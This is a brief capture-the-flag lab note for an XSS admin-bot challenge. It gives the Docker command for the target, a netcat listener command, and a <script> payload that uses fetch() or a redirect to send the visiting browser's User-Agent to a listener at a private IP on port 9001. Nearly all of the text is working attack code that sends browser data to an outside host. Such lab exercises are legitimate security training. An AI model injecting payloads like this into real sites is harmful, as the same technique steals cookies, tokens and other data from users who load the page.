
docker run -d --restart always -p 3555:3555 --name xss-admin-bot joshbeck2024/ctf-xss-admin-bot
nc (netcat) listener on Kalinc -lvnp 9001

Payload:
<script>
// Using fetch (may require CORS to be loose or mode: 'no-cors')
fetch('<http://192.168.228.7:9001/?ua=>' + encodeURIComponent(navigator.userAgent));
// Alternatively, using specific window redirection which is often more reliable for simple exfiltration
// window.location = '<http://192.168.229.149:9001/?ua=>' + encodeURIComponent(navigator.userAgent);
</script>
User-Agent header once the bot checks your message and executes the malicious <script>